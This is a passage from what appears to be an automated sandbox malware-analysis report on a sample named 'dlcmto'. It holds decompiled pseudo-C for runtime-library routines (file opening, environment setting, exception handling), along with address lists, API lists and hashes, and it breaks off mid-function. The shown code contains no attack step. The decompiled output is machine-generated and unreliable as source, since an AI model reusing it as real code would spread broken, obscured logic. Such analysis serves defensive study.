                                          • Instruction Fuzzy Hash: A8C1BF70A0424E9FDF1DDFADD880BAD7BB1AF59318F04406DE535AB282DB349941CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119C410 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 42%
                                          			E0119C410(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E0119C890(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E01198BF2(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t253 = E0119C7FB();
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E01198D96(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x11a9458 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E0119CAB4(_t189, 0);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x11a9458 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x11a9458 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E0119C7FB();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x11a9458 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E01196E65(GetLastError());
											 *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E01198D05( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E0119CA0A(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0119D5EB(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E01196E65(_t271);
							 *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E01196E3F(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x11a9458 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E01196E65(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E0119C7FB();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E01196E52(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E01196E3F(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E01196E52(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E01196E3F(_t289)));
				}
			}

























































                                          0x0119c433
                                          0x0119c437
                                          0x0119c438
                                          0x0119c438
                                          0x0119c438
                                          0x0119c43a
                                          0x0119c43d
                                          0x0119c440
                                          0x0119c45b
                                          0x0119c460
                                          0x0119c463
                                          0x0119c465
                                          0x0119c467
                                          0x0119c486
                                          0x0119c48d
                                          0x0119c494
                                          0x0119c497
                                          0x0119c4a3
                                          0x0119c4a6
                                          0x0119c4ae
                                          0x0119c4af
                                          0x0119c4b2
                                          0x0119c4b2
                                          0x0119c4b9
                                          0x0119c4bb
                                          0x0119c4be
                                          0x0119c4c6
                                          0x0119c4c9
                                          0x0119c536
                                          0x0119c537
                                          0x0119c53d
                                          0x0119c53f
                                          0x0119c588
                                          0x0119c58b
                                          0x0119c594
                                          0x0119c597
                                          0x0119c59a
                                          0x0119c59c
                                          0x0119c59c
                                          0x0119c59c
                                          0x0119c58d
                                          0x0119c590
                                          0x0119c590
                                          0x0119c5a1
                                          0x0119c5a4
                                          0x0119c5b0
                                          0x0119c5b5
                                          0x0119c5c1
                                          0x0119c5cb
                                          0x0119c5cf
                                          0x0119c5d9
                                          0x0119c5dc
                                          0x0119c5e7
                                          0x0119c5ec
                                          0x0119c60b
                                          0x0119c60e
                                          0x0119c612
                                          0x0119c613
                                          0x0119c619
                                          0x0119c61e
                                          0x0119c621
                                          0x0119c623
                                          0x0119c625
                                          0x0119c62a
                                          0x0119c62c
                                          0x0119c62e
                                          0x0119c631
                                          0x0119c633
                                          0x0119c64d
                                          0x0119c671
                                          0x0119c675
                                          0x0119c679
                                          0x0119c67b
                                          0x0119c67f
                                          0x0119c681
                                          0x0119c68b
                                          0x0119c68e
                                          0x0119c695
                                          0x0119c695
                                          0x0119c695
                                          0x0119c695
                                          0x0119c67f
                                          0x0119c69a
                                          0x0119c6a6
                                          0x0119c6a8
                                          0x0119c733
                                          0x0119c733
                                          0x00000000
                                          0x0119c6ae
                                          0x0119c6ae
                                          0x0119c6b2
                                          0x00000000
                                          0x00000000
                                          0x0119c6b7
                                          0x0119c6c9
                                          0x0119c6d1
                                          0x0119c6d4
                                          0x0119c6d5
                                          0x0119c6d8
                                          0x0119c6df
                                          0x0119c6e4
                                          0x0119c6e7
                                          0x0119c71b
                                          0x0119c725
                                          0x0119c725
                                          0x0119c72f
                                          0x00000000
                                          0x0119c72f
                                          0x0119c6f0
                                          0x0119c709
                                          0x0119c710
                                          0x0119c530
                                          0x00000000
                                          0x0119c530
                                          0x0119c6a8
                                          0x0119c635
                                          0x00000000
                                          0x0119c5ee
                                          0x0119c5f5
                                          0x0119c5f8
                                          0x0119c5fa
                                          0x00000000
                                          0x00000000
                                          0x0119c5fc
                                          0x0119c5fe
                                          0x0119c5fe
                                          0x00000000
                                          0x0119c604
                                          0x0119c5ec
                                          0x0119c547
                                          0x0119c54a
                                          0x0119c565
                                          0x0119c56a
                                          0x0119c570
                                          0x0119c572
                                          0x0119c57d
                                          0x0119c57d
                                          0x00000000
                                          0x0119c572
                                          0x0119c4cb
                                          0x0119c4d2
                                          0x0119c4d4
                                          0x0119c50b
                                          0x0119c50b
                                          0x0119c515
                                          0x0119c518
                                          0x0119c51f
                                          0x0119c51f
                                          0x0119c51f
                                          0x0119c52b
                                          0x00000000
                                          0x0119c52b
                                          0x0119c4d6
                                          0x0119c4da
                                          0x00000000
                                          0x00000000
                                          0x0119c4dc
                                          0x0119c4eb
                                          0x0119c4f0
                                          0x0119c4f3
                                          0x0119c4f4
                                          0x0119c4f7
                                          0x0119c4f7
                                          0x0119c4fe
                                          0x0119c500
                                          0x0119c503
                                          0x0119c506
                                          0x0119c509
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119c469
                                          0x0119c46e
                                          0x0119c471
                                          0x0119c478
                                          0x00000000
                                          0x0119c478
                                          0x0119c442
                                          0x0119c442
                                          0x0119c447
                                          0x0119c447
                                          0x0119c44d
                                          0x0119c44f
                                          0x00000000
                                          0x0119c454

                                          APIs
                                            • Part of subcall function 0119C7FB: CreateFileW.KERNEL32(00000000,00000000,?,0119C4B9,?,?,00000000,?,0119C4B9,00000000,0000000C), ref: 0119C818
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0119C524
                                          • __dosmaperr.LIBCMT ref: 0119C52B
                                          • GetFileType.KERNEL32(00000000), ref: 0119C537
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0119C541
                                          • __dosmaperr.LIBCMT ref: 0119C54A
                                          • CloseHandle.KERNEL32(00000000), ref: 0119C56A
                                          • CloseHandle.KERNEL32(01199280), ref: 0119C6B7
                                          • GetLastError.KERNEL32 ref: 0119C6E9
                                          • __dosmaperr.LIBCMT ref: 0119C6F0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID:
                                          • API String ID: 4237864984-0
                                          • Opcode ID: a43645632df98253e62eb191b4f0502a45de8ace63bafa250ea5a3376bfc6628
                                          • Instruction ID: 8445861f5b90d61105adcbcbe4d5b55bf587d1866694240c0283b4f485d764c9
                                          • Opcode Fuzzy Hash: a43645632df98253e62eb191b4f0502a45de8ace63bafa250ea5a3376bfc6628
                                          • Instruction Fuzzy Hash: F5A11632A041598FDF2DDF7CD891BAE3BA1AB46324F140159E861AF391DB349942C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01198820 Relevance: 12.2, APIs: 8, Instructions: 208COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E01198820(signed int __ebx, void* __edi, void* __esi, signed int _a4) {
				intOrPtr _v0;
				signed int _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t49;
				signed int _t52;
				signed int _t54;
				signed int _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				signed int _t68;
				signed int _t69;
				intOrPtr* _t76;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t96;
				signed int _t97;
				void* _t98;
				void* _t100;
				signed int _t109;
				signed int _t110;
				signed int _t112;
				signed int _t115;
				signed int _t118;
				void* _t119;
				void* _t121;
				void* _t124;
				void* _t125;

				_t88 = __ebx;
				_t121 = _t119;
				_push(_t121);
				_t125 = _t124 - 0x10;
				_push(__esi);
				_t115 = _a4;
				_t128 = _t115;
				if(_t115 != 0) {
					_push(__ebx);
					_push(__edi);
					_t112 = _t115;
					_t49 = E0119BE30(_t115, 0x3d);
					_v24 = _t49;
					__eflags = _t49;
					if(__eflags == 0) {
						L39:
						 *((intOrPtr*)(E01196E3F(__eflags))) = 0x16;
						goto L40;
					} else {
						__eflags = _t49 - _t115;
						if(__eflags == 0) {
							goto L39;
						} else {
							_v9 =  *((intOrPtr*)(_t49 + 1));
							L44();
							_t88 = 0;
							__eflags =  *0x11a9190;
							if( *0x11a9190 != 0) {
								L15:
								_t54 =  *0x11a9190;
								_v16 = _t54;
								__eflags = _t54;
								if(_t54 == 0) {
									goto L40;
								} else {
									_t57 = E01198A83(_t115, _v24 - _t115);
									_v20 = _t57;
									_t96 = _v16;
									__eflags = _t57;
									if(_t57 < 0) {
										L25:
										__eflags = _v9 - _t88;
										if(_v9 == _t88) {
											goto L41;
										} else {
											_t58 =  ~_t57;
											_v20 = _t58;
											_t30 = _t58 + 2; // 0x2
											_t110 = _t30;
											__eflags = _t110 - _t58;
											if(_t110 < _t58) {
												goto L40;
											} else {
												__eflags = _t110 - 0x3fffffff;
												if(_t110 >= 0x3fffffff) {
													goto L40;
												} else {
													_v16 = E0119864B(_t96, _t110, 4);
													E011963FE(_t88);
													_t61 = _v16;
													_t125 = _t125 + 0x10;
													__eflags = _t61;
													if(_t61 == 0) {
														goto L40;
													} else {
														_t97 = _v20;
														_t112 = _t88;
														 *(_t61 + _t97 * 4) = _t115;
														 *(_t61 + 4 + _t97 * 4) = _t88;
														goto L30;
													}
												}
											}
										}
									} else {
										__eflags =  *_t96 - _t88;
										if( *_t96 == _t88) {
											goto L25;
										} else {
											E011963FE( *((intOrPtr*)(_t96 + _t57 * 4)));
											_t109 = _v20;
											__eflags = _v9 - _t88;
											if(_v9 != _t88) {
												_t112 = _t88;
												 *(_v16 + _t109 * 4) = _t115;
											} else {
												_t110 = _v16;
												while(1) {
													__eflags =  *((intOrPtr*)(_t110 + _t109 * 4)) - _t88;
													if( *((intOrPtr*)(_t110 + _t109 * 4)) == _t88) {
														break;
													}
													 *((intOrPtr*)(_t110 + _t109 * 4)) =  *((intOrPtr*)(_t110 + 4 + _t109 * 4));
													_t109 = _t109 + 1;
													__eflags = _t109;
												}
												_v20 = E0119864B(_t110, _t109, 4);
												E011963FE(_t88);
												_t61 = _v20;
												_t125 = _t125 + 0x10;
												__eflags = _t61;
												if(_t61 != 0) {
													L30:
													 *0x11a9190 = _t61;
												}
											}
											__eflags = _a4 - _t88;
											if(_a4 == _t88) {
												goto L41;
											} else {
												_t40 = _t115 + 1; // 0x1
												_t98 = _t40;
												do {
													_t62 =  *_t115;
													_t115 = _t115 + 1;
													__eflags = _t62;
												} while (_t62 != 0);
												_t41 = _t115 - _t98 + 2; // 0x3
												_v20 = _t41;
												_t118 = E011971A3(_t41, 1);
												_pop(_t100);
												__eflags = _t118;
												if(_t118 == 0) {
													L38:
													E011963FE(_t118);
													goto L41;
												} else {
													__eflags = E01194B71(_t118, _v20, _v0);
													if(__eflags != 0) {
														_push(_t88);
														_push(_t88);
														_push(_t88);
														_push(_t88);
														_push(_t88);
														E011964E1();
														asm("int3");
														_t68 =  *0x11a9190;
														__eflags = _t68 -  *0x11a919c;
														if(_t68 ==  *0x11a919c) {
															_push(_t68);
															_t69 = E01198AD8(_t88, _t100, _t112, _t118);
															 *0x11a9190 = _t69;
															return _t69;
														}
														return _t68;
													} else {
														asm("sbb eax, eax");
														 *(_v24 + 1 + _t118 - _v0 - 1) = _t88;
														__eflags = E0119C04C(_v24 + 1 + _t118 - _v0, _t110, __eflags, _t118,  ~_v9 & _v24 + 0x00000001 + _t118 - _v0);
														if(__eflags == 0) {
															_t76 = E01196E3F(__eflags);
															_t89 = _t88 | 0xffffffff;
															__eflags = _t89;
															 *_t76 = 0x2a;
														}
														goto L38;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a4;
								if(_a4 == 0) {
									L10:
									__eflags = _v9 - _t88;
									if(_v9 != _t88) {
										 *0x11a9190 = E011971A3(1, 4);
										E011963FE(_t88);
										_t125 = _t125 + 0xc;
										__eflags =  *0x11a9190 - _t88;
										if( *0x11a9190 == _t88) {
											L40:
											_t89 = _t88 | 0xffffffff;
											__eflags = _t89;
											goto L41;
										} else {
											__eflags =  *0x11a9194 - _t88;
											if( *0x11a9194 != _t88) {
												goto L15;
											} else {
												 *0x11a9194 = E011971A3(1, 4);
												E011963FE(_t88);
												_t125 = _t125 + 0xc;
												__eflags =  *0x11a9194 - _t88;
												if( *0x11a9194 == _t88) {
													goto L40;
												} else {
													goto L15;
												}
											}
										}
									} else {
										_t89 = 0;
										L41:
										E011963FE(_t112);
										_t52 = _t89;
										goto L42;
									}
								} else {
									__eflags =  *0x11a9194;
									if( *0x11a9194 == 0) {
										goto L10;
									} else {
										__eflags = E0119370F();
										if(__eflags == 0) {
											goto L39;
										} else {
											L44();
											goto L15;
										}
									}
								}
							}
						}
					}
				} else {
					_t87 = E01196E3F(_t128);
					 *_t87 = 0x16;
					_t52 = _t87 | 0xffffffff;
					L42:
					return _t52;
				}
			}


































                                          0x01198820
                                          0x01198825
                                          0x0119882d
                                          0x01198830
                                          0x01198833
                                          0x01198834
                                          0x01198837
                                          0x01198839
                                          0x0119884e
                                          0x0119884f
                                          0x01198853
                                          0x01198855
                                          0x0119885a
                                          0x0119885f
                                          0x01198861
                                          0x01198a42
                                          0x01198a47
                                          0x00000000
                                          0x01198867
                                          0x01198867
                                          0x01198869
                                          0x00000000
                                          0x0119886f
                                          0x01198872
                                          0x01198875
                                          0x0119887a
                                          0x0119887c
                                          0x01198882
                                          0x011988ff
                                          0x011988ff
                                          0x01198904
                                          0x01198907
                                          0x01198909
                                          0x00000000
                                          0x0119890f
                                          0x01198916
                                          0x0119891b
                                          0x01198920
                                          0x01198923
                                          0x01198925
                                          0x01198976
                                          0x01198976
                                          0x01198979
                                          0x00000000
                                          0x0119897f
                                          0x0119897f
                                          0x01198981
                                          0x01198984
                                          0x01198984
                                          0x01198987
                                          0x01198989
                                          0x00000000
                                          0x0119898f
                                          0x0119898f
                                          0x01198995
                                          0x00000000
                                          0x0119899b
                                          0x011989a5
                                          0x011989a8
                                          0x011989ad
                                          0x011989b0
                                          0x011989b3
                                          0x011989b5
                                          0x00000000
                                          0x011989bb
                                          0x011989bb
                                          0x011989be
                                          0x011989c0
                                          0x011989c3
                                          0x00000000
                                          0x011989c3
                                          0x011989b5
                                          0x01198995
                                          0x01198989
                                          0x01198927
                                          0x01198927
                                          0x01198929
                                          0x00000000
                                          0x0119892b
                                          0x0119892e
                                          0x01198934
                                          0x01198937
                                          0x0119893a
                                          0x0119896f
                                          0x01198971
                                          0x0119893c
                                          0x0119893c
                                          0x01198949
                                          0x01198949
                                          0x0119894c
                                          0x00000000
                                          0x00000000
                                          0x01198945
                                          0x01198948
                                          0x01198948
                                          0x01198948
                                          0x01198958
                                          0x0119895b
                                          0x01198960
                                          0x01198963
                                          0x01198966
                                          0x01198968
                                          0x011989c7
                                          0x011989c7
                                          0x011989c7
                                          0x01198968
                                          0x011989cc
                                          0x011989cf
                                          0x00000000
                                          0x011989d1
                                          0x011989d1
                                          0x011989d1
                                          0x011989d4
                                          0x011989d4
                                          0x011989d6
                                          0x011989d7
                                          0x011989d7
                                          0x011989df
                                          0x011989e3
                                          0x011989eb
                                          0x011989ee
                                          0x011989ef
                                          0x011989f1
                                          0x01198a39
                                          0x01198a3a
                                          0x00000000
                                          0x011989f3
                                          0x01198a02
                                          0x01198a04
                                          0x01198a5e
                                          0x01198a5f
                                          0x01198a60
                                          0x01198a61
                                          0x01198a62
                                          0x01198a63
                                          0x01198a68
                                          0x01198a69
                                          0x01198a6e
                                          0x01198a74
                                          0x01198a76
                                          0x01198a77
                                          0x01198a7d
                                          0x00000000
                                          0x01198a7d
                                          0x01198a82
                                          0x01198a06
                                          0x01198a17
                                          0x01198a1b
                                          0x01198a27
                                          0x01198a29
                                          0x01198a2b
                                          0x01198a30
                                          0x01198a30
                                          0x01198a33
                                          0x01198a33
                                          0x00000000
                                          0x01198a29
                                          0x01198a04
                                          0x011989f1
                                          0x011989cf
                                          0x01198929
                                          0x01198925
                                          0x01198884
                                          0x01198884
                                          0x01198887
                                          0x011988a5
                                          0x011988a5
                                          0x011988a8
                                          0x011988bb
                                          0x011988c0
                                          0x011988c5
                                          0x011988c8
                                          0x011988ce
                                          0x01198a4d
                                          0x01198a4d
                                          0x01198a4d
                                          0x00000000
                                          0x011988d4
                                          0x011988d4
                                          0x011988da
                                          0x00000000
                                          0x011988dc
                                          0x011988e6
                                          0x011988eb
                                          0x011988f0
                                          0x011988f3
                                          0x011988f9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011988f9
                                          0x011988da
                                          0x011988aa
                                          0x011988aa
                                          0x01198a50
                                          0x01198a51
                                          0x01198a58
                                          0x00000000
                                          0x01198a5a
                                          0x01198889
                                          0x01198889
                                          0x0119888f
                                          0x00000000
                                          0x01198891
                                          0x01198896
                                          0x01198898
                                          0x00000000
                                          0x0119889e
                                          0x0119889e
                                          0x00000000
                                          0x0119889e
                                          0x01198898
                                          0x0119888f
                                          0x01198887
                                          0x01198882
                                          0x01198869
                                          0x0119883b
                                          0x0119883b
                                          0x01198840
                                          0x01198846
                                          0x01198a5b
                                          0x01198a5d
                                          0x01198a5d

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 3409252457-0
                                          • Opcode ID: 00a77d6809383f3b0d004c82bfa92dd881c141c3a123efe518c0e520de00b967
                                          • Instruction ID: 97408e6bf60b2df1b59b7171f317fe539476c4c3bc179ea01d89af4c212d9fc8
                                          • Opcode Fuzzy Hash: 00a77d6809383f3b0d004c82bfa92dd881c141c3a123efe518c0e520de00b967
                                          • Instruction Fuzzy Hash: 6161E47190420AAFEF2DAFBCD840A6D7FA4AF03728F04416ED6349B181EB359540CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011921F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 45%
                                          			E011921F0(void* __ebx, void* __ecx, intOrPtr __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				void* _v36;
				void* _v40;
				char* __edi;
				intOrPtr* __esi;
				int _t150;
				signed int _t157;
				intOrPtr _t158;
				void* _t159;
				intOrPtr* _t160;
				intOrPtr _t162;
				void* _t165;
				signed int _t167;
				void _t175;
				void _t176;
				int _t178;
				unsigned int _t179;
				int _t180;
				int _t191;
				intOrPtr* _t195;
				intOrPtr _t196;
				signed int _t200;
				char _t202;
				int _t206;
				unsigned int _t207;
				int _t208;
				int _t210;
				int _t215;
				signed int _t226;
				unsigned int _t230;
				int _t231;
				int _t233;
				signed int _t239;
				void* _t240;
				intOrPtr _t241;
				void* _t243;
				signed int _t251;
				intOrPtr _t258;
				void* _t260;
				void* _t263;
				void* _t264;
				void* _t265;
				intOrPtr* _t267;
				int _t271;
				void* _t275;
				void* _t277;
				void* _t287;

				_t221 = __edx;
				_t195 = _a4;
				_push(_t240);
				_v5 = 0;
				_v16 = 1;
				 *_t195 = E0119F2C3(__ecx,  *_t195);
				_t196 = _a8;
				_t6 = _t196 + 0x10; // 0x11
				_t258 = _t6;
				_push(_t258);
				_v20 = _t258;
				_v12 =  *(_t196 + 8) ^  *0x11a7210;
				E011921B0(_t196, __edx, _t240, _t258,  *(_t196 + 8) ^  *0x11a7210);
				E01194EF7(_a12);
				_t150 = _a4;
				_t277 = _t275 - 0x1c + 0x10;
				_t241 =  *((intOrPtr*)(_t196 + 0xc));
				if(( *(_t150 + 4) & 0x00000066) != 0) {
					__eflags = _t241 - 0xfffffffe;
					if(_t241 != 0xfffffffe) {
						_t221 = 0xfffffffe;
						E01194EE0(_t196, 0xfffffffe, _t258, 0x11a7210);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t150;
					_v28 = _a12;
					 *((intOrPtr*)(_t196 - 4)) =  &_v32;
					if(_t241 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t200 = _v12;
							_t157 = _t241 + (_t241 + 2) * 2;
							_t196 =  *((intOrPtr*)(_t200 + _t157 * 4));
							_t158 = _t200 + _t157 * 4;
							_t201 =  *((intOrPtr*)(_t158 + 4));
							_v24 = _t158;
							if( *((intOrPtr*)(_t158 + 4)) == 0) {
								_t202 = _v5;
								goto L7;
							} else {
								_t221 = _t258;
								_t159 = E01194E80(_t201, _t258);
								_t202 = 1;
								_v5 = 1;
								_t287 = _t159;
								if(_t287 < 0) {
									_v16 = 0;
									L13:
									_push(_t258);
									E011921B0(_t196, _t221, _t241, _t258, _v12);
									goto L14;
								} else {
									if(_t287 > 0) {
										_t160 = _a4;
										__eflags =  *_t160 - 0xe06d7363;
										if( *_t160 == 0xe06d7363) {
											__eflags =  *0x11a01f8;
											if(__eflags != 0) {
												_t191 = E01194CD0(__eflags, 0x11a01f8);
												_t277 = _t277 + 4;
												__eflags = _t191;
												if(_t191 != 0) {
													_t271 =  *0x11a01f8; // 0x1192055
													 *0x11aa000(_a4, 1);
													 *_t271();
													_t258 = _v20;
													_t277 = _t277 + 8;
												}
												_t160 = _a4;
											}
										}
										_t222 = _t160;
										E01194EC0(_t160, _a8, _t160);
										_t162 = _a8;
										__eflags =  *((intOrPtr*)(_t162 + 0xc)) - _t241;
										if( *((intOrPtr*)(_t162 + 0xc)) != _t241) {
											_t222 = _t241;
											E01194EE0(_t162, _t241, _t258, 0x11a7210);
											_t162 = _a8;
										}
										_push(_t258);
										 *((intOrPtr*)(_t162 + 0xc)) = _t196;
